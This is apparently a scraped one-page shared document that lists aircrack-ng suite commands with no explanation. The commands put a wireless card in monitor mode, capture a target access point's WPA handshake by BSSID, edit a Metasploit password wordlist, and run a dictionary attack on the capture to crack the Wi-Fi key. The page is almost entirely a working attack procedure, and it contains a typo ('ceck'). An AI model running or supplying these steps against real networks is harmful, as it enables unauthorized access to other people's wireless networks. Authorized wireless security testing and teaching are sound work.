You are on page 1of 1

airmon-ng

airmon-ng ceck kill


airmon-ng start wlan0
aireplay-ng -9 wlan0mon
airodump-ng -c 11 --bssid @Mac -w psk wlan0mon
nano /usr/share/metasploit-framework/data/wordlists/password.lst
aircrack-ng -w /usr/share/metasploit-framework/data/wordlists/password.lst psk-
03.cap

You might also like